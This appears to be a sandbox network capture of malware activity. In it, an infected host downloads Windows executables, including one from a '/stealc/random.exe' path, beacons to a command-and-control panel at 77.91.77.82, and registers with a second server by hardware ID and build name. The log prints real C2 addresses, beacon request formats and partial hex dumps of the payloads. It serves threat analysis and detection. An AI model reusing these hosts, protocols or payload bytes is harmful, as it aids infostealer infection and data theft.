Jul 24, 2024 02:40:07.576257944 CEST	1120	IN	Data Raw: c4 0c a3 6c cd 62 00 6a 0e 68 64 1b 42 00 68 74 1b 42 00 e8 df 22 00 00 83 c4 0c a3 f0 cb 62 00 6a 0c 68 84 1b 42 00 68 94 1b 42 00 e8 c6 22 00 00 83 c4 0c a3 04 ca 62 00 6a 08 68 a4 1b 42 00 68 b0 1b 42 00 e8 ad 22 00 00 83 c4 0c a3 c8 cd 62 00 Data Ascii: lbjhdBhtB"bjhBhB"bjhBhB"bjhBhB"DbjhBhB{"dbjhBhBb"PbjhBhBI"bjhBh4B0"bjhLBh`B"<bjhtBhB
Jul 24, 2024 02:40:07.576272964 CEST	1236	IN	Data Raw: 0d 42 00 68 ee 0d 42 00 e8 8a 1e 00 00 83 c4 0c a3 cc cd 62 00 6a 00 68 ef 0d 42 00 68 f2 0d 42 00 e8 71 1e 00 00 83 c4 0c a3 0c cd 62 00 6a 00 68 f3 0d 42 00 68 f6 0d 42 00 e8 58 1e 00 00 83 c4 0c a3 b0 cb 62 00 c7 05 d0 cd 62 00 00 00 00 00 c7 Data Ascii: BhBbjhBhBqbjhBhBXbbbjhBhB+bjhBhBbjhBh Bbjh$ Bh8 B,bjhL BhT B0bjh\ Bht Bbj
Jul 24, 2024 02:40:07.576286077 CEST	1236	IN	Data Raw: a3 10 cc 62 00 6a 10 68 cc 25 42 00 68 e0 25 42 00 e8 ad 19 00 00 83 c4 0c a3 e0 c8 62 00 6a 13 68 f4 25 42 00 68 08 26 42 00 e8 94 19 00 00 83 c4 0c a3 ec c9 62 00 6a 0b 68 1c 26 42 00 68 28 26 42 00 e8 7b 19 00 00 83 c4 0c a3 4c cb 62 00 6a 09 Data Ascii: bjh%Bh%Bbjh%Bh&Bbjh&Bh(&B{Lbjh4&Bh@&BbbjhL&BhX&BIbjhd&Bhp&B0bjh\|&Bh&Bbjh&Bh&Bbjh&Bh&B bjh&Bh&B
Jul 24, 2024 02:40:07.576301098 CEST	1236	IN	Data Raw: 00 68 b8 2c 42 00 e8 e4 14 00 00 83 c4 0c a3 08 cb 62 00 6a 10 68 cc 2c 42 00 68 e0 2c 42 00 e8 cb 14 00 00 83 c4 0c a3 5c ca 62 00 6a 0f 68 f4 2c 42 00 68 04 2d 42 00 e8 b2 14 00 00 83 c4 0c a3 38 cb 62 00 6a 10 68 14 2d 42 00 68 28 2d 42 00 e8 Data Ascii: h,Bbjh,Bh,B\bjh,Bh-B8bjh-Bh(-BXbjh<-BhP-BDbjhd-Bhx-Bg<bjh-Bh-BNbjh-Bh-B5bjh-Bh-Blbjh-Bh.Bb
Jul 24, 2024 02:40:07.576314926 CEST	1236	IN	Data Raw: 83 c4 0c a3 f4 ca 62 00 6a 04 68 18 34 42 00 68 20 34 42 00 e8 02 10 00 00 83 c4 0c a3 ec cb 62 00 6a 05 68 14 33 42 00 68 28 34 42 00 e8 e9 0f 00 00 83 c4 0c a3 e4 c8 62 00 6a 08 68 1c 33 42 00 68 30 34 42 00 e8 d0 0f 00 00 83 c4 0c a3 b8 cc 62 Data Ascii: bjh4Bh 4Bbjh3Bh(4Bbjh3Bh04Bbj h<4Bh`4Bbjh4Bh4Bbjh4Bh4Bbjh4Bh4Blbj_h4BhP5BSbjh5Bh5B:lbjh4Bh5
Jul 24, 2024 02:40:07.576348066 CEST	1236	IN	Data Raw: 1c 3b 42 00 68 4c 3b 42 00 e8 39 0b 00 00 83 c4 0c a3 d4 c9 62 00 6a 13 68 7c 3b 42 00 68 90 3b 42 00 e8 20 0b 00 00 83 c4 0c a3 ec cc 62 00 6a 33 68 a4 3b 42 00 68 d8 3b 42 00 e8 07 0b 00 00 83 c4 0c a3 44 cd 62 00 6a 0b 68 0c 3c 42 00 68 18 3c Data Ascii: ;BhL;B9bjh\|;Bh;B bj3h;Bh;BDbjh<Bh<Bbjh$<Bh4<BbjhD<BhT<Bbjhd<Bhp<B(bjh\|<Bh<Bbjh<Bh<Bqbjh<Bh<BX
Jul 24, 2024 02:40:07.576369047 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:07 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Mon, 22 Jul 2024 02:01:04 GMT Connection: keep-alive ETag: "669dbd60-2ee00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 af 9d 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELPfB"d@0$@<#\|$.textJ .rdata@@.data+!@.reloc*D#F@B

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:07.829430103 CEST	179	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 31 39 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019031&unit=246122658369
Jul 24, 2024 02:40:08.565160036 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:08.574732065 CEST	54	OUT	GET /stealc/random.exe HTTP/1.1 Host: 77.91.77.81
Jul 24, 2024 02:40:09.272741079 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:09 GMT Content-Type: application/octet-stream Content-Length: 290816 Last-Modified: Wed, 24 Jul 2024 00:35:02 GMT Connection: keep-alive ETag: "66a04c36-47000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 13 47 21 47 57 26 4f 14 57 26 4f 14 57 26 4f 14 38 50 d1 14 44 26 4f 14 38 50 e5 14 33 26 4f 14 38 50 e4 14 48 26 4f 14 5e 5e dc 14 50 26 4f 14 57 26 4e 14 26 26 4f 14 38 50 e0 14 56 26 4f 14 38 50 d5 14 56 26 4f 14 38 50 d2 14 56 26 4f 14 52 69 63 68 57 26 4f 14 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 78 60 8b 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 f6 02 00 00 44 03 02 00 00 00 00 d8 2e 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 05 02 00 04 00 00 9a fc 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$G!GW&OW&OW&O8PD&O8P3&O8PH&O^^P&OW&N&&O8PV&O8PV&O8PV&ORichW&OPELx`eD.@t<P`@<3@.text `.rdata$68@@.dataP2@.rsrc@`@@
Jul 24, 2024 02:40:09.272773981 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 e4 32 43 00 e9 e0 0f 00 00 56 8b f1 c7 06 e4 32 43 00 e8 d2 0f 00 00 f6 44 Data Ascii: 2CV2CD$tVY^\CV\CD$tVY^4U$PbCeETbCV3W{EEuXbCE?E\bCEE EE\<
Jul 24, 2024 02:40:09.272806883 CEST	1236	IN	Data Raw: ec 00 00 00 00 8b 45 ec 01 05 e8 36 45 02 46 81 fe bd 74 06 00 7c d8 6a 7b 5e 81 3d 5c 3c 45 02 86 00 00 00 75 2e 53 53 53 53 53 53 53 ff 15 b8 10 43 00 53 53 ff 15 70 10 43 00 53 ff 15 10 10 43 00 53 53 53 53 ff 15 88 10 43 00 53 53 ff 15 64 10 Data Ascii: E6EFt\|j{^=\<Eu.SSSSSSSCSSpCSCSSSSCSSdCNuh2C6EM_^d[V3=\<EWuJVVVVCVVVVVVVVVVCVVeVVVVVVMVV~(3vl}VVCVCVLC
Jul 24, 2024 02:40:09.272840023 CEST	1236	IN	Data Raw: 06 00 00 68 1c 36 43 00 8d 45 f4 50 c7 45 f4 1c 12 43 00 e8 59 15 00 00 cc 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 83 06 00 00 c7 06 1c 12 43 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 ec 0c 8b 45 08 89 45 08 8d 45 08 50 8d 4d f4 e8 ce 05 00 00 68 58 Data Ascii: h6CEPECYUVuC^]UEEEPMhX6CEPE(CUVu6(C^]UVEtVY^]UVEtVY^]UVEtVY^]UW
Jul 24, 2024 02:40:09.272890091 CEST	1236	IN	Data Raw: c2 04 00 8b ff 55 8b ec 83 ec 28 a1 24 58 43 00 33 c5 89 45 fc 53 56 8b 75 08 57 ff 75 10 8b 7d 0c 8d 4d dc e8 53 ff ff ff 8d 45 dc 50 33 db 53 53 53 53 57 8d 45 d8 50 8d 45 f0 50 e8 9d 25 00 00 89 45 ec 8d 45 f0 56 50 e8 3f 20 00 00 83 c4 28 f6 Data Ascii: U($XC3ESVuWu}MSEP3SSSSWEPEP%EEVP? (Eu+u8]tE`pjX/u8]tE`pjEuEu8]tE`p3M_^3[,UjuuF]UM4CH@]Au<CU}
Jul 24, 2024 02:40:09.272921085 CEST	1236	IN	Data Raw: 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 5c 23 40 00 8b ff 6c 23 40 00 74 23 40 00 84 23 40 00 98 23 40 Data Ascii: DDDDDDDDDDDD$\#@l#@t#@#@#@E^_FGE^_IFGFGE^_FGFGFGE^_U}t-uj5DCuV'HCP'Y^]jh6CI/3}3u;;u
Jul 24, 2024 02:40:09.272954941 CEST	776	IN	Data Raw: d2 f7 f7 39 45 14 76 21 83 fb ff 74 0c 53 6a 00 51 e8 dd 3e 00 00 83 c4 0c 85 f6 74 c1 83 c8 ff 33 d2 f7 f7 39 45 14 77 b5 0f af 7d 14 f7 46 0c 0c 01 00 00 89 7d f0 8b df 74 08 8b 46 18 89 45 f4 eb 07 c7 45 f4 00 10 00 00 85 ff 0f 84 da 00 00 00 Data Ascii: 9Ev!tSjQ>t39Ew}F}tFEEFtDFt=;r;}W6uu=)~>}+)}};]r\}t3;vuu+;w;Ew[PuV(YP<t{
Jul 24, 2024 02:40:09.272984982 CEST	1236	IN	Data Raw: 06 f6 44 32 04 80 74 16 8b d1 3b d0 73 10 8b f0 80 3a 0a 75 01 43 42 3b d6 72 f5 89 5d f4 83 7d fc 00 75 1b 8b c3 e9 d8 00 00 00 84 d2 78 ef e8 86 20 00 00 c7 00 16 00 00 00 e9 87 00 00 00 f6 47 0c 01 0f 84 b4 00 00 00 8b 57 04 85 d2 75 08 21 55 Data Ascii: D2t;s:uCB;r]}ux GWu!U]u+JEED0tyjjuU>;Eu GM8uE@;rG @juu >y89EwOttGED0t
Jul 24, 2024 02:40:09.273056984 CEST	1236	IN	Data Raw: 8d 7f 10 4a 75 ef 83 e1 0f 74 24 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 83 e1 03 74 09 8a 06 88 07 46 47 49 75 f7 58 5e 5f 5d c3 ba 10 00 00 00 2b d0 2b ca 51 8b c2 8b c8 83 e1 03 74 09 8a 16 88 17 46 47 49 75 f7 c1 e8 Data Ascii: Jut$tvIutFGIuX^_]++QtFGIutvHuYjC[E3-t"ttHt3VWh3FWPY63~~~~PCF+@Ou
Jul 24, 2024 02:40:09.273091078 CEST	1236	IN	Data Raw: 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 83 c6 02 80 3e 00 75 d0 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 69 fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 b4 54 43 00 5a 66 8b 31 66 89 30 83 c1 Data Ascii: D;FG;v}>uuE}ur{CijCCTCZf1f0JuL@;v~0C@IuCCSs3{95DTM_^3[jh87CM}_h
Jul 24, 2024 02:40:09.278121948 CEST	1236	IN	Data Raw: 12 8b 47 04 3b c3 74 0b 39 18 75 07 50 e8 2e ea ff ff 59 83 c7 10 ff 4d 08 75 c7 56 e8 1f ea ff ff 59 5f 5e 5b 5d c3 8b ff 55 8b ec 57 8b 7d 0c 85 ff 74 3b 8b 45 08 85 c0 74 34 56 8b 30 3b f7 74 28 57 89 38 e8 6a fd ff ff 59 85 f6 74 1b 56 e8 ee Data Ascii: G;t9uP.YMuVY_^[]UW}t;Et4V0;t(W8jYtV>YuWCtVsY^3_]jhX7COUCFpt"~ltpluj cYbjM>Ye5WClVYYYEEjF=Yuj

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:10.467654943 CEST	179	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000021001&unit=246122658369
Jul 24, 2024 02:40:11.156172037 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:11.300605059 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 24, 2024 02:40:12.003346920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 24, 2024 02:40:12.004087925 CEST	303	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 24, 2024 02:40:12.226443052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:11.417293072 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 24, 2024 02:40:12.041596889 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 00:40:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 24, 2024 02:40:12.044514894 CEST	408	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI Host: 85.28.47.31 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 45 45 30 33 45 36 32 37 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 2d 2d 0d 0a Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="hwid"C5EE03E62791922063497------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build"sila------AAKKFHCFIECAAAKEGCFI--
Jul 24, 2024 02:40:12.225372076 CEST	210	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 00:40:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 02:40:12.348089933 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 24, 2024 02:40:13.067027092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 24, 2024 02:40:13.067800999 CEST	303	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 24, 2024 02:40:13.296674967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Jul 2024 00:40:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0